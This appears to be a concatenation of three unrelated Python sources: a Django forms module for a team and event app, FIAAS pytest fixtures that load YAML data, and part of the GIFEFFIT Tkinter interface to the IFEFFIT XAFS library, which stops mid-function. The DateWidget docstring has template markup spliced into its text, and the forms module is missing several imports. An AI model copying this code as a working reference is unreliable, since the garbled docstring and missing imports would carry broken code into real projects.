from django.contrib.auth.models import User
from .models.locale import Country, SPR, City
from .models.profiles import Team, UserProfile, Sponsor
from .models.events import (
Event,
EventComment,
CommonEvent,
EventSeries,
Place,
EventPhoto,
)
from .models.speakers import (
Speaker,
Talk,
Presentation,
SpeakerRequest,
)
import recurrence
import pytz
from datetime import time
from time import strptime, strftime
class Lookup(TextInput):
input_type = 'text'
template_name = 'forms/widgets/lookup.html'
add_id_index = False
checked_attribute = {'selected': True}
option_inherits_attrs = False
def __init__(self, source, key="id", label='__str__', attrs=None):
super().__init__(attrs)
self.source = source
self.key = key
self.label = label
def get_context(self, name, value, attrs):
context = super().get_context(name, value, attrs)
return context
def format_value(self, value):
if value is not None:
lookup_query = {self.key: value}
lookup_object = self.source.objects.get(**lookup_query)
lookup_field = getattr(lookup_object, self.label)
if callable(lookup_field):
lookup_value = lookup_field()
else:
lookup_value = lookup_field
return mark_safe('<option value="%s">%s</option>' % (value, lookup_value))
else:
return mark_safe('<option value="">--------</option>')
class DateWidget(forms.DateInput):
"""A more-friendly date widget with a p% if widget.value != None %} value="{{ widget.value|stringformat:'s' }}"{% endif %op-up calendar.
"""
template_name = 'forms/widgets/date.html'
def __init__(self, attrs=None):
self.date_class = 'datepicker'
if not attrs:
attrs = {}
if 'date_class' in attrs:
self.date_class = attrs.pop('date_class')
if 'class' not in attrs:
attrs['class'] = 'date'
super(DateWidget, self).__init__(attrs=attrs)
class TimeWidget(forms.MultiWidget):
"""A more-friendly time widget.
"""
def __init__(self, attrs=None):
self.time_class = 'timepicker'
if not attrs:
attrs = {}
if 'time_class' in attrs:
self.time_class = attrs.pop('time_class')
if 'class' not in attrs:
attrs['class'] = 'time'
widgets = (
forms.Select(attrs=attrs, choices=[(i + 1, "%02d" % (i + 1)) for i in range(0, 12)]),
forms.Select(attrs=attrs, choices=[(i, "%02d" % i) for i in range(00, 60, 15)]),
forms.Select(attrs=attrs, choices=[('AM', _('AM')), ('PM', _('PM'))])
)
super(TimeWidget, self).__init__(widgets, attrs)
def decompress(self, value):
if isinstance(value, str):
try:
value = strptime(value, '%I:%M %p')
except:
value = strptime(value, '%H:%M:%S')
hour = int(value.tm_hour)
minute = int(value.tm_min)
if hour < 12:
meridian = 'AM'
else:
meridian = 'PM'
hour -= 12
return (hour, minute, meridian)
elif isinstance(value, time):
hour = int(value.strftime("%I"))
minute = int(value.strftime("%M"))
meridian = value.strftime("%p")
return (hour, minute, meridian)
return (None, None, None)
def value_from_datadict(self, data, files, name):
value = super(TimeWidget, self).value_from_datadict(data, files, name)
t = strptime("%02d:%02d %s" % (int(value[0]), int(value[1]), value[2]), "%I:%M %p")
return strftime("%H:%M:%S", t)
def format_output(self, rendered_widgets):
return '<span class="%s">%s%s%s</span>' % (
self.time_class,
rendered_widgets[0], rendered_widgets[1], rendered_widgets[2]
)
class DateTimeWidget(forms.SplitDateTimeWidget):
"""
A more-friendly date/time widget.
"""
def __init__(self, attrs=None, date_format=None, time_format=None):
super(DateTimeWidget, self).__init__(attrs, date_format, time_format)
self.widgets = (
DateWidget(attrs=attrs),
TimeWidget(attrs=attrs),
)
def decompress(self, value):
if value:
d = strftime("%Y-%m-%d", value.timetuple())
t = strftime("%I:%M %p", value.timetuple())
return (d, t)
else:
return (None, None)
def format_output(self, rendered_widgets):
return '%s %s' % (rendered_widgets[0], rendered_widgets[1])
def value_from_datadict(self, data, files, name):
values = super(DateTimeWidget, self).value_from_datadict(data, files, name)
return ' '.join(values)
class TeamForm(forms.ModelForm):
class Meta:
model = Team
fields = [
'name',
'description',
'about_page',
'category',
'city',
'web_url',
'tz',
'cover_img',
]
widgets = {
'city': Lookup(source=City),
}
raw_id_fields = ('city')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['city'].required = True
class NewTeamForm(forms.ModelForm):
class Meta:
model = Team
fields = [
'name',
'city',
'tz',
'cover_img',
]
widgets = {
'city': Lookup(source=City),
}
raw_id_fields = ('city')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['city'].required = True
class TeamDefinitionForm(forms.ModelForm):
class Meta:
model = Team
fields = ['category', 'web_url', 'description', 'about_page']
class DeleteTeamForm(forms.Form):
confirm = forms.BooleanField(label="Yes, delete team", required=True)
class TeamContactForm(forms.Form):
to = forms.ChoiceField(label=_(""))
body = forms.CharField(label=_(""), widget=forms.widgets.Textarea)
class MultiEmailField(forms.Field):
def to_python(self, value):
"""Normalize data to a list of strings."""
# Return an empty list if no input was given.
if not value:
return []
return [email.strip() for email in value.split(',')]
def validate(self, value):
"""Check if value consists only of valid emails."""
# Use the parent's handling of required fields, etc.
super().validate(value)
for email in value:
validate_email(email)
class TeamInviteForm(forms.Form):
to = MultiEmailField(label=_(""), widget=forms.widgets.Textarea)
class TeamEventForm(forms.ModelForm):
recurrences = recurrence.forms.RecurrenceField(label="Repeat", required=False)
class Meta:
model = Event
fields = ['name', 'start_time', 'end_time', 'recurrences', 'summary', 'web_url', 'announce_url', 'tags']
widgets = {
'place': Lookup(source=Place),
'start_time': DateTimeWidget,
'end_time': DateTimeWidget
}
def __init__(self, *args, **kargs):
super().__init__(*args, **kargs)
event_tz = pytz.timezone(self.instance.tz)
if self.instance.local_start_time: self.initial['start_time'] = self.instance.local_start_time
if self.instance.local_end_time: self.initial['end_time'] = self.instance.local_end_time
print("Initial: %s" % self.initial)
def clean(self):
cleaned_data = super().clean()
event_tz = pytz.timezone(self.instance.tz)
print("Clean: %s" % cleaned_data)
cleaned_data['start_time'] = pytz.utc.localize(timezone.make_naive(event_tz.localize(timezone.make_naive(cleaned_data['start_time']))))
cleaned_data['end_time'] = pytz.utc.localize(timezone.make_naive(event_tz.localize(timezone.make_naive(cleaned_data['end_time']))))
return cleaned_data
class NewTeamEventForm(forms.ModelForm):
recurrences = recurrence.forms.RecurrenceField(label="Repeat", required=False)
class Meta:
model = Event
fields = ['name', 'start_time', 'end_time', 'recurrences', 'summary']
widgets = {
'start_time': DateTimeWidget,
'end_time': DateTimeWidget
}
def __init__(self, *args, **kargs):
super().__init__(*args, **kargs)
event_tz = pytz.timezone(self.instance.tz)
if self.instance.local_start_time: self.initial['start_time'] = self.instance.local_start_time
if self.instance.local_end_time: self.initial['end_time'] = self.instance.local_end_time
print("Initial: %s" % self.initial)
def clean(self):
cleaned_data = super().clean()
event_tz = pytz.timezone(self.instance.tz)
print("Clean: %s" % cleaned_data)
cleaned_data['start_time'] = pytz.utc.localize(timezone.make_naive(event_tz.localize(timezone.make_naive(cleaned_data['start_time']))))
cleaned_data['end_time'] = pytz.utc.localize(timezone.make_naive(event_tz.localize(timezone.make_naive(cleaned_data['end_time']))))
return cleaned_data
class DeleteEventForm(forms.Form):
confirm = forms.BooleanField(label="Yes, delete event", required=True)
class CancelEventForm(forms.Form):
confirm = forms.BooleanField(label="Yes, cancel this event", required=True)
reason = forms.CharField(label=_("Reason for cancellation"), widget=forms.widgets.Textarea)
class EventInviteMemberForm(forms.Form):
member = forms.ChoiceField(label=_(""))
class EventInviteEmailForm(forms.Form):
emails = MultiEmailField(label=_(""), widget=forms.widgets.Textarea)
class EventContactForm(forms.Form):
to = forms.ChoiceField(label=_(""))
body = forms.CharField(label=_(""), widget=forms.widgets.Textarea)
class EventSeriesForm(forms.ModelForm):
class Meta:
model = EventSeries
fields = ['name', 'start_time', 'end_time', 'recurrences', 'summary']
widgets = {
'start_time': TimeWidget,
'end_time': TimeWidget
}
class DeleteEventSeriesForm(forms.Form):
confirm = forms.BooleanField(label="Yes, delete series", required=True)
class UploadEventPhotoForm(forms.ModelForm):
class Meta:
model = EventPhoto
fields = ['src', 'title', 'caption']
class EventCommentForm(forms.ModelForm):
class Meta:
model = EventComment
fields = ['body']
class SponsorForm(forms.ModelForm):
class Meta:
model = Sponsor
fields = ['name', 'web_url', 'logo']
class NewPlaceForm(forms.ModelForm):
class Meta:
model = Place
fields = ['name', 'address', 'city', 'longitude', 'latitude', 'place_url', 'tz']
widgets = {
'city': Lookup(source=City),
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['city'].required = True
class UserForm(forms.ModelForm):
class Meta:
model = User
fields = ['email']
class UserProfileForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = ['avatar', 'realname', 'city', 'tz', 'send_notifications']
labels = {
'send_notifications': _('Send me notification emails'),
}
widgets = {
'city': Lookup(source=City),
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['city'].required = True
class ConfirmProfileForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = ['avatar', 'realname', 'city']
widgets = {
'city': Lookup(source=City),
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['city'].required = True
class SendNotificationsForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = ['send_notifications']
labels = {
'send_notifications': _('Send me notification emails'),
}
class SearchForm(forms.Form):
city = forms.IntegerField(required=False, widget=Lookup(source=City, label='name'))
distance = forms.IntegerField(label=_("Distance(km)"), required=True)
class Meta:
widgets ={
'city': Lookup(source=City, label='name'),
}
class NewCommonEventForm(forms.ModelForm):
class Meta:
model = CommonEvent
fields = [
'name',
'start_time',
'end_time',
'summary',
'country',
'spr',
'city',
'place',
'web_url',
'announce_url',
'category',
'tags',
]
widgets ={
'country': Lookup(source=Country, label='name'),
'spr': Lookup(source=SPR, label='name'),
'city': Lookup(source=City, label='name'),
'place': Lookup(source=Place, label='name'),
'start_time': DateTimeWidget,
'end_time': DateTimeWidget
}
class SpeakerBioForm(forms.ModelForm):
class Meta:
model = Speaker
fields = ['avatar', 'title', 'bio', 'categories']
class DeleteSpeakerForm(forms.Form):
confirm = forms.BooleanField(label="Yes, delete series", required=True)
class UserTalkForm(forms.ModelForm):
class Meta:
model = Talk
fields = ['speaker', 'title', 'abstract', 'talk_type', 'web_url', 'category']
class DeleteTalkForm(forms.Form):
confirm = forms.BooleanField(label="Yes, delete series", required=True)
class SchedulePresentationForm(forms.ModelForm):
class Meta:
model = Presentation
fields = ['start_time']
| StarcoderdataPython |
1617133 | #!/usr/bin/env python
# -*- coding: utf-8
# Copyright 2017-2019 The FIAAS Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import yaml
@pytest.fixture
def load_app_config_testdata(request):
def _load(filename):
path = _find_file(filename+".yml", request.fspath.dirpath(), "examples")
with open(path, 'r') as fobj:
return yaml.safe_load(fobj)
return _load
@pytest.fixture
def load_app_config_transformations(request):
def _load(filename):
path = _find_file(filename+".yml", request.fspath.dirpath(), "transformations")
with open(path, 'r') as fobj:
return yaml.safe_load(fobj)
return _load
def _find_file(needle, root, kind):
parents = root.parts(True)
for parent in parents:
dirs = [parent]
for part in ("data", kind):
dirs.append(dirs[-1].join(part))
for d in dirs:
candidate = d.join(needle)
if candidate.check():
return candidate.strpath
raise ValueError("File {} not found".format(needle))
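# Usage sketch: a test module that can see these fixtures requests them by name.
# The "v3minimal" file stem is hypothetical -- any <name>.yml reachable through a
# data/examples/ (or data/transformations/) directory near the test works.
#
# def test_load_app_config(load_app_config_testdata):
#     config = load_app_config_testdata("v3minimal")
#     assert isinstance(config, dict)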
| StarcoderdataPython |
3233713 | <gh_stars>1-10
#!/usr/bin/python
##
## GIFEFFIT: Graphical User Interface to the IFEFFIT XAFS Analysis Library
##
## Copyright (c) 1997--2000 <NAME>, The University of Chicago
## Copyright (c) 1992--1996 <NAME>, University of Washington
##
## Permission to use and redistribute the source code or binary forms of
## this software and its documentation, with or without modification is
## hereby granted provided that the above notice of copyright, these
## terms of use, and the disclaimer of warranty below appear in the
## source code and documentation, and that none of the names of The
## University of Chicago, The University of Washington, or the authors
## appear in advertising or endorsement of works derived from this
## software without specific prior written permission from all parties.
##
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
## EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
## MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
## IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
## CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
## TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
## SOFTWARE OR THE USE OR OTHER DEALINGS IN THIS SOFTWARE.
##
from Tkinter import *
from string import *
from Ifeffit import Ifeffit
from TkIfeffit import *
from DataPlotter import *
import re, os, sys, types
import Pmw, ScrolledText, tkFileDialog, tkColorChooser
from tkFileDialog import askopenfilename
# from Pmw import MessageDialog
class ReadDataFile(BaseWindow):
""" ReadDataFile Class: prompt for ASCII file name, guess array names,
allow them to be changed, and read in file"""
def __init__(self, iff_com=None, master=None):
self.iff_com = iff_com
self.master = master
self.main = None
self.input_file = ''
self.marray = 32
self.narray = 16
self.array_disp = 7
self.array = []
self.entr = []
self.file_type = StringVar()
self.file_type.set('<from column labels>')
for i in range(self.marray):
self.array.append('')
self.entr.append('')
self.read()
def btn_press(self,btn,event=None):
if ((btn == 'ok') or (btn == 'apply')):
self.read_cmd = self.read_final_file()
if ((btn == 'ok') or (btn == 'cancel')): self.main.destroy()
if (btn == 'newfile'):
self.main.withdraw()
self.read(self.master)
def ftype_choice(self,event=None):
x = event
if ((self.input_file == None) or (self.input_file == '')): return
if (x == '<from column labels>'):
self.read_temp_file()
else:
for i in range(self.marray): self.array[i] = ' '
if (x == 'xmu'):
self.array[0] = 'energy'
self.array[1] = 'xmu'
elif (x == 'chi'):
self.array[0] = 'k'
self.array[1] = 'chi'
elif (x == 'chi.dat'):
self.array[0] = 'k'
self.array[1] = 'chi'
self.array[2] = 'mag'
self.array[3] = 'phase'
elif (x == 'feff.dat'):
self.array[0] = 'k'
self.array[1] = 'cphase'
self.array[2] = 'mag'
self.array[3] = 'phase'
self.array[4] = 'redfactor'
self.array[5] = 'lambda'
self.array[6] = 'realp'
self.array_disp = 7
elif (x == 'rsp'):
self.array[0] = 'r'
self.array[1] = 'chi_re'
self.array[2] = 'chi_im'
self.array[3] = 'chi_mag'
self.array[4] = 'chi_phase'
for i in range(self.array_disp):
self.entr[i].delete(0,END)
self.entr[i].insert(0,self.array[i])
def read(self, master=None, title='Read ASCII Data File'):
self.input_file = ask_for_file(self.master,
[("data files","*.dat *.chi *.xmu"),
("all files","*")] )
if (master == None):
self.main = Tk()
else:
self.main = Toplevel(master)
Frame.__init__(self, self.main)
self.main.title(title)
self.main.option_add('*font', ('Helvetica', 12))
if ((self.input_file != None) and (self.input_file != '')):
self.read_temp_file()
self.display_arrays()
else:
self.main.destroy()
def display_arrays(self):
ma = self.main
self.balloon = Pmw.Balloon(ma)
self.menuBar = Pmw.MenuBar(ma, hull_borderwidth=1,
hull_relief = 'raised',
hotkeys=1, balloon = self.balloon)
self.menuBar.pack(fill='x')
self.menuBar.addmenu('File', 'Read, Cancel, Exit')
self.menuBar.addmenuitem('File', 'command',
'Read this file with these arrays',
label='Read',
command= Command(self.btn_press, 'apply'))
self.menuBar.addmenuitem('File', 'command',
'Do not read this file, Look for a new file',
label='Change File',
command= Command(self.btn_press, 'newfile'))
self.menuBar.addmenuitem('File', 'command',
'Close without reading these arrays from this file',
label='Cancel',
command= Command(self.btn_press, 'cancel'))
self.menuBar.addmenuitem('File', 'command',
'Read this file with these arrays, and exit',
label='OK',
command= Command(self.btn_press, 'ok'))
# file buffer display
self.f_win = Pmw.ScrolledText(ma,label_text=self.input_file,
borderframe = 1,usehullsize=0,
text_padx = 10, text_pady = 10,
labelpos=NW,
hull_width=650, hull_height=320)
self.f_win.importfile(self.input_file)
self.f_win.pack(side='top')
# group name
fr_0 = Frame(ma)
fr_0.pack(side='top',anchor='w')
fr_1 = Frame(fr_0)
fr_1.pack(side='left', fill='x',anchor='w')
fr1 = Frame(fr_1)
Label(fr1, text='Group: ').pack(side='left')
self.g_ent = Entry(fr1,width=20)
self.g_ent.selection_clear()
self.g_ent.insert(0,self.group)
self.g_ent.pack(side='left',fill='x')
fr1.pack(side='left',fill='x')
fr_4 = Frame(fr_0)
fr_4.pack(side='left', fill='x',anchor='w')
self.file_type.set('<from column labels>')
self.ftypes = Pmw.OptionMenu(fr_4, labelpos = 'w',
label_text = ' Column File Types: ',
menubutton_textvariable = self.file_type,
menubutton_width = 22,
items = ['<from column labels>',
'xmu','chi','rsp', 'chi.dat', 'feff.dat'],
initialitem = '<from column labels>',
command = Command(self.ftype_choice),
)
# menubutton_width = 18)
self.ftypes.pack(side='left',fill='x')
# arrays name
fr_2 = Frame(ma)
fr_2.pack(side='top',anchor='w')
fr2 = Frame(fr_2)
Label(fr2, text='Arrays: ').pack(side='left')
for i in range(self.array_disp):
self.entr[i] = Entry(fr2, width=10)
self.entr[i].selection_clear()
self.entr[i].insert(0,self.array[i])
self.entr[i].pack(side='left')
fr2.pack(side='top')
#
fr_3 = Frame(ma)
bbox = Pmw.ButtonBox(fr_3)
bbox.pack(side='left',fill='both', expand=1)
b_ok= bbox.add('OK', command = Command(self.btn_press,'ok'))
b_rd= bbox.add('Read', command = Command(self.btn_press,'apply'))
b_ca= bbox.add('Done', command = Command(self.btn_press,'cancel'))
b_nf=bbox.add('Change File', command = Command(self.btn_press,'newfile'))
bbox.setdefault('Read')
bbox.alignbuttons()
self.balloon.bind(b_ok, '',
'Read these arrays from this file and exit')
self.balloon.bind(b_rd, '',
'Read these arrays from this file')
self.balloon.bind(b_ca, '',
'Close without reading these arrays from this file')
self.balloon.bind(b_nf, '',
'Do not read these arrays, Look for a new file')
fr_3.pack()
self.createMsgWin(ma)
def read_temp_file(self):
if ((self.input_file == '') or (self.input_file == None)): return
self.iff_com('read_data(group=_xx_,notitles,type=label,file=%s)'
% self.input_file)
col_lab = strip(self.get_string('column_label'))
if (col_lab == '--undefined--'):
self.iff_com('read_data(group=_xx_,notitles,type=raw,file=%s)'
% self.input_file)
col_lab = strip(self.get_string('column_label'))
if (col_lab == '--undefined--'):
self.f_win.clear()
self.f_win.settext(' Invalid File: ' + self.input_file )
self.group = ' '
for i in range(self.marray): self.array[i] = ' '
return
tmp_lis = split(col_lab)
s = os.path.basename(self.input_file)
x = split(s,'.')
self.group = x[0]
self.narray = min(self.marray,len(tmp_lis))
for i in range(self.marray): self.array[i] = ' '
for i in range(self.narray): self.array[i] = tmp_lis[i]
g = self.group
# erase temp arrays
for i in range(self.marray):
a = self.array[i]
if (a != ' '): s = self.iff_com('erase _XX_.%s' % a)
def read_final_file(self):
if ((self.input_file=='') or (self.input_file == None)): return
g = self.g_ent.get()
c = 'read_data(file=%s, group=%s,label=(' %(self.input_file, g)
# print ' array size = ' , self.narray, self.marray
for i in range(self.narray):
d = self.array[i]
if (i < self.array_disp): d = self.entr[i].get()
c = c + d + ' '
self.iff_com( c + '))')
###############################################################################
##
## GIFEFFIT CLASS
##
###############################################################################
class GIFeffit(BaseWindow,Ifeffit):
progname = "<NAME>"
version = "0.9"
copyright = """ Copyright (c) 2000 <NAME> \n The University of Chicago"""
contact = """ email: <EMAIL> \n web: http://cars9.uchicago.edu/ifeffit/ """
def __init__(self, load=None):
self.root = Tk()
# launch Ifeffit in screen_echo = 0 mode
Ifeffit.__init__(self, screen_echo = 0)
# self.iff_com = self.ifeffit
self.root.option_add('*font', ('Helvetica', 12))
self.drawsplash(self.root)
Pmw.initialise(self.root)
self.root.withdraw()
self.root.title('G.I.Feffit')
self.inp_buff = [] # command buffer
self.ind_ = 0 # index in inp_buff
self.plot_opts = self.reset_plot_opts()
self.prefs = {}
self.feff_paths= {}
self.ask_exit = 1
self.iff_com = self.do_ifeffit
self.balloon = Pmw.Balloon(self.root)
self.inp_buff.append("") ;
self.createMenubar(self.root)
self.createMainWin(self.root)
self.root.mainloop()
def drawsplash(self,master):
# Create about dialog.
Pmw.aboutversion(self.version)
Pmw.aboutcopyright(self.copyright)
Pmw.aboutcontact(self.contact)
self.about = Pmw.AboutDialog(master, applicationname = self.progname)
self.about.after(2000,self.removesplash)
def removesplash(self):
self.root.deiconify()
self.iff_com("newplot")
self.clear_echo_buffer()
self.about.withdraw()
def createMainWin(self,master=None):
pane = Pmw.PanedWidget(master,hull_width=700,hull_height=350)
pane.add('top',min=80,max=800)
pane.add('bot',min=50,max=60)
nbFrame = Pmw.NoteBook(pane.pane('top'),
raisecommand= Command(self.nb_raise))
nbFrame.pack(fill = 'both', expand= 1, padx = 1, pady = 1)
# Add the "Appearance" page to the notebook.
cmd_page = nbFrame.add('Command Buffer')
sca_page = nbFrame.add('Scalars')
arr_page = nbFrame.add('Arrays')
str_page = nbFrame.add('Strings')
mac_page = nbFrame.add('Macros')
pth_page = nbFrame.add('Feff Paths')
self.nbframe = nbFrame
self.balloon.bind(cmd_page, '', 'Ifeffit commands and raw output')
self.balloon.bind(sca_page, '', 'Ifeffit scalars')
self.balloon.bind(arr_page, '', 'Ifeffit arrays')
self.balloon.bind(str_page, '', 'Ifeffit strings')
self.balloon.bind(mac_page, '', 'Macros')
self.balloon.bind(pth_page, '', 'Feff Path Definitions')
self.cmd_win = ScrolledText.ScrolledText(cmd_page)
self.cmd_win.configure(width=85, height=40)
self.cmd_win.tag_configure('output', foreground='red',font=('Helvetica', 12))
self.cmd_win.tag_configure('input', font=('Helvetica', 12))
self.cmd_win.pack(side='top')
self.sca_win = ScrolledText.ScrolledText(sca_page)
self.sca_win.configure(width=85, height=40, font=('Courier', 12))
self.sca_win.insert('end', "\n\n")
self.sca_win.pack(side='top')
self.arr_win = ScrolledText.ScrolledText(arr_page)
self.arr_win.configure(width=85, height=40, font=('Courier', 12))
self.arr_win.insert('end', "\n\n")
self.arr_win.pack(side='top')
self.str_win = ScrolledText.ScrolledText(str_page)
self.str_win.configure(width=85, height=40, font=('Courier', 12))
self.str_win.insert('end', "\n\n")
self.str_win.pack(side='top')
self.mac_win = ScrolledText.ScrolledText(mac_page)
self.mac_win.configure(width=85, height=40)
self.mac_win.insert('end', "\n\n")
self.mac_win.pack(side='top')
self.pth_win = ScrolledText.ScrolledText(pth_page)
self.pth_win.configure(width=85, height=40)
self.pth_win.insert('end', "\n\n")
self.pth_win.pack(side='top')
nbFrame.setnaturalsize()
self.cmdBox = Frame(pane.pane('bot'))
self.cmdFrame = Frame(self.cmdBox)
Label(self.cmdFrame, text='Ifeffit>').pack(side='left')
self.cmdBox.pack(side='top', anchor='w')
self.cmdFrame.pack(anchor='w', side='left',fill='x')
self.command = StringVar()
self.field = Entry(self.cmdFrame, width=64)
self.balloon.bind(self.field, '',
'Enter Ifeffit commands or use arrows to scroll through commands')
self.field['textvariable'] = self.command
self.field.bind('<Return>', self.process)
self.field.bind('<Up>', self.process)
self.field.bind('<Down>', self.process)
self.field.pack(side='left')
self.createMsgWin(pane.pane('bot'))
pane.pack(expand = 1, fill = 'both')
def createMenubar(self, master):
self.menuBar = Pmw.MenuBar(master, hull_borderwidth=1,
hull_relief = 'raised',
hotkeys=1, balloon = self.balloon)
self.menuBar.pack(fill='x')
self.menuBar.addmenu('File', 'Read Files or Exit')
# self.menuBar.addcascademenu('File', 'Read')
self.menuBar.addmenuitem('File', 'command', 'Read Data File',
label='Read Data File',
command=Command(self.read_datafile, self.root))
self.menuBar.addmenuitem('File', 'command', 'Load Command File',
label='Read Command File',
command=Command(self.read_cmndfile, self.root))
self.menuBar.addmenuitem('File', 'command',
'Restore a saved session from a .sav file',
label='Read Saved Session',
command=Command(self.restore_state, self.root))
self.menuBar.addmenuitem('File', 'separator')
# self.menuBar.addcascademenu('File', 'Write')
# self.menuBar.addmenuitem('Write', 'command', 'Write Data File',
# label='Write Data File',
# command=Command(self.write_datafile, self.root))
self.menuBar.addmenuitem('File', 'command', 'Write Command File',
label='Write Command File',
command=Command(self.write_cmndfile, self.root))
self.menuBar.addmenuitem('File', 'command', 'Save session to .sav file',
label='Save session',
command=Command(self.save_state, self.root))
self.menuBar.addmenuitem('File', 'separator')
self.menuBar.addmenuitem('File', 'command', 'Close', label='Exit',
command=Command(self.exit))
self.menuBar.addmenu('Help', 'About', side='right')
self.menuBar.addmenuitem('Help', 'command', 'Get information on application',
label='About...', command=self.help)
# self.menuBar.addmenu('Edit', 'Edit Text and Preferences')
# self.menuBar.addmenuitem('Edit', 'command', 'Define and Edit Macros',
# label='Macros',
# command=Command(self.macro_editor, self.root))
# self.menuBar.addmenuitem('Edit', 'command', 'Equaton Editor',
# label='Equation Editor',
# command=Command(self.macro_editor, self.root))
# self.menuBar.addmenuitem('Edit', 'separator')
# self.menuBar.addmenuitem('Edit', 'command', 'Plot Preferences',
# label='Plot Preferences',
# command=Command(self.setplot_opts, self.root))
#
# self.menuBar.addmenuitem('Edit', 'command', 'General Preferences',
# label='General Preferences',
# command=Command(self.set_prefs, self.root))
self.menuBar.addmenu('Plotting', 'General Data Plotting')
self.menuBar.addmenuitem('Plotting', 'command',
'General Plot Interface', label='Plotter',
command=Command(self.plotter, self.root))
self.menuBar.addmenu('XAFS', 'XAFS Data Analysis ')
self.menuBar.addmenuitem('XAFS', 'command',
'EXAFS Pre-Edge and Normalization',
label='Pre-Edge',
command=Command(self.pre_edge, self.root))
self.menuBar.addmenuitem('XAFS', 'command',
'EXAFS Background Subtraction',
label='Background',
command=Command(self.autobk, self.root))
self.menuBar.addmenuitem('XAFS', 'command',
'EXAFS Fourier Transforms',
label='FFT ',
command=Command(self.fft, self.root))
# self.menuBar.addmenuitem('Analysis', 'command',
# 'Define FEFF Path',
# label='Define FEFF Paths',
# command=Command(self.def_paths, self.root))
def process(self, event):
if ( event.keysym == 'Return'):
cmd = self.command.get()
self.do_ifeffit(cmd)
else:
dir = 0
if (event.keysym == 'Up'): dir = -1
if (event.keysym == 'Down'): dir = 1
self.ind_ = self.ind_ + dir
if (self.ind_ < 1):
self.ind_ = 0
self.command.set("")
elif (self.ind_ == len(self.inp_buff)):
self.command.set("")
self.ind_ = self.ind_ - 1
else:
self.command.set(self.inp_buff[self.ind_])
def do_ifeffit(self,cmd="",do_raise=1):
"""execute Ifeffit command in GIFeffit's Notebook motif,
updating the Command Buffer and currently raised page"""
ret = 0
cmd = strip(cmd)
if (cmd != ""):
if ((cmd == 'quit') or (cmd =='exit')):
self.exit(prompt=self.ask_exit)
elif (cmd == 'pwd'):
s = os.getcwd()
self.cmd_win.insert('end'," %s\n" % cmd, 'input')
self.cmd_win.insert('end'," %s\n" % s, 'output')
self.command.set("")
self.cmd_win.see('end')
elif ((cmd == 'cd') or (cmd[0:3] == 'cd ')):
try:
os.chdir(cmd[3:])
except OSError:
pass
s = os.getcwd()
self.cmd_win.insert('end'," %s\n" % cmd, 'input')
self.cmd_win.insert('end'," %s\n" % s, 'output')
self.command.set("")
self.cmd_win.see('end')
elif ((cmd[0:3] == 'ls ') or (cmd[0:4] == 'dir ') or
(cmd == 'ls') or (cmd == 'dir')):
self.cmd_win.insert('end'," %s\n" % cmd, 'input')
t = os.getcwd()
self.cmd_win.insert('end'," %s:\n" % t, 'output')
s = os.listdir(t)
s.sort()
out = ''
for i in range(len(s)):
lsi = len(s[i])
if (lsi < 20):
out = out + s[i] + ' '*(22 - lsi)
else:
out = out + s[i] + ' '
if (len(out) > 71):
self.cmd_win.insert('end'," %s\n" % out, 'output')
out = ''
if (len(out) > 1):
self.cmd_win.insert('end'," %s\n" % out, 'output')
out = ''
self.command.set("")
self.cmd_win.see('end')
elif (cmd[0:1] == '!'):
os.system(cmd[1:])
self.command.set("")
else:
ret = self.iff_exec(cmd)
self.inp_buff.append(cmd)
self.cmd_win.insert('end'," %s\n" % cmd, 'input')
self.command.set("")
self.cmd_win.see('end')
self.ind_ = len(self.inp_buff)
self.add_echo_lines(self.cmd_win, erase=0)
# update the currently raised window
if (do_raise == 1):
raised = self.nbframe.getcurselection()
self.nb_raise(raised)
return ret
def nb_raise(self,page):
if (page == 'Arrays'): self.arrays_update()
elif (page == 'Scalars'): self.scalars_update()
elif (page == 'Strings'): self.strings_update()
elif (page == 'Macros'): self.macros_update()
elif (page == 'Feff Paths'): self.paths_update()
def arrays_update(self):
self.clear_echo_buffer()
self.iff_com("show @arrays")
self.add_echo_lines(self.arr_win, erase=1)
def scalars_update(self):
self.clear_echo_buffer()
self.iff_com("show @scalars")
self.add_echo_lines(self.sca_win, erase=1)
def strings_update(self):
self.clear_echo_buffer()
self.iff_com("show @strings")
self.add_echo_lines(self.str_win, erase=1)
def macros_update(self):
self.clear_echo_buffer()
self.iff_com("show @macros")
self.mac_win.delete(0.0, self.mac_win.index('end') )
self.mac_win.tag_configure('desc', foreground='darkgreen', font=('Helvetica', 12))
self.mac_win.tag_configure('args', foreground='red', font=('Helvetica', 12))
nmac = 0
macargs = []
macdesc = []
buff = self.get_echo_buffer()
for s in buff:
if (s[0:5] == 'macro'):
sx = re.split(r',*\s+', strip(s[6:]))
macargs.append(sx)
macdesc.append("")
nmac = nmac + 1
else:
if (nmac > 0): macdesc[nmac-1] = s
for i in range(nmac):
self.mac_win.insert('end', "macro %s" % macargs[i][0])
self.mac_win.insert('end', " ")
for j in range(1,len(macargs[i])):
self.mac_win.insert('end', " %s" % macargs[i][j], 'args')
self.mac_win.insert('end', "\n")
if (macdesc[i] != ""): self.mac_win.insert('end', " %s\n" % macdesc[i], 'desc')
self.iff_com("show %s " % macargs[i][0])
skip = 1
if (macdesc[i] != ""): skip = 2
buff = self.get_echo_buffer()
i = 0
for s in buff:
